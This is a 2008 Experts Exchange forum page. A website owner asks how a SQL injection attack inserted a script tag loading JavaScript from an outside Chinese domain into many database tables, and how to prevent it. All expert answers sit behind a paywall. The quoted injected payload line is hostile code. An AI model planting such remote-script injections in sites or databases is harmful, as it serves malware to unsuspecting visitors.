Advertisement

06.10.2008 at 03:25AM PDT, ID: 23471800
[x]
Attachment Details

Preventing a SQL Injection attack - help needed

Asked by fgict in Active Server Pages (ASP), MS SQL Server, JavaScript

My website has suffered an attack with the following code being posted to a large number of database tables:
<script src=http://www.killpp.cn/k.js></script>
It appears they gained access to SQL Server DB somehow as no asp files in the FTP folder appear to have changed.
I cannot understand how this happened, I though I had a secure SQl DB setup with strong password and username.
Can anyone offer advise on:
1. How thay might have gained access and
2. How to prevent this in the future?Start Free Trial
 
Keywords: Preventing a SQL Injection attack - hel…
Title
1 Attack IRAN?
2 Dynamic SQL / Stored Procedure and…
3 Brute Force Attack
4 Blocking a sql injection attack in ASP
5 ****Help***** Spam Attack
6 this is why they attacked us???
 
Loading Advertisement...
 
[+][-]06.10.2008 at 03:39AM PDT, ID: 21749868

Assisted solutions are selected by the member who asked the question as a comment that contributed to their question's solution.

Start your 7-day free trial to view this Assisted Solution or ask the Experts your question.

 
[+][-]06.10.2008 at 05:15AM PDT, ID: 21750383

View this solution now by starting your 7-day free trial. Setting up your free trial is quick, easy, and secure. We will return you to this solution, unlocked, when you're done.

 

About this solution

Zones: Active Server Pages (ASP), MS SQL Server, JavaScript
Sign Up Now!
Solution Provided By: bluefezteam
Participating Experts: 4
Solution Grade: A
 
 
[+][-]06.10.2008 at 06:23AM PDT, ID: 21750952

Often, when Experts are collaborating with members who have asked questions, they will request additional information about the problem. Askers respond with an author comment like this one.

Start your 7-day free trial to view this Author Comment or ask the Experts your question.

 
[+][-]06.10.2008 at 06:31AM PDT, ID: 21751032

Assisted solutions are selected by the member who asked the question as a comment that contributed to their question's solution.

Start your 7-day free trial to view this Assisted Solution or ask the Experts your question.

 
[+][-]06.10.2008 at 06:41AM PDT, ID: 21751119

Often, when Experts are collaborating with members who have asked questions, they will request additional information about the problem. Askers respond with an author comment like this one.

Start your 7-day free trial to view this Author Comment or ask the Experts your question.

 
[+][-]06.10.2008 at 06:50AM PDT, ID: 21751213

Often, when Experts are collaborating with members who have asked questions, they will request additional information about the problem. Askers respond with an author comment like this one.

Start your 7-day free trial to view this Author Comment or ask the Experts your question.

 
[+][-]06.10.2008 at 07:37AM PDT, ID: 21751685

At Experts Exchange, members can ask their questions to thousands of technology professionals, also known as Experts. Experts compete and collaborate to answer those questions by leaving comments like this one.

Start your 7-day free trial to view this Expert Comment or ask the Experts your question.

 
[+][-]06.10.2008 at 08:25AM PDT, ID: 21752152

At Experts Exchange, members can ask their questions to thousands of technology professionals, also known as Experts. Experts compete and collaborate to answer those questions by leaving comments like this one.

Start your 7-day free trial to view this Expert Comment or ask the Experts your question.

 
 
Loading Advertisement...
20080716-EE-VQP-32 / EE_QW_2_20070628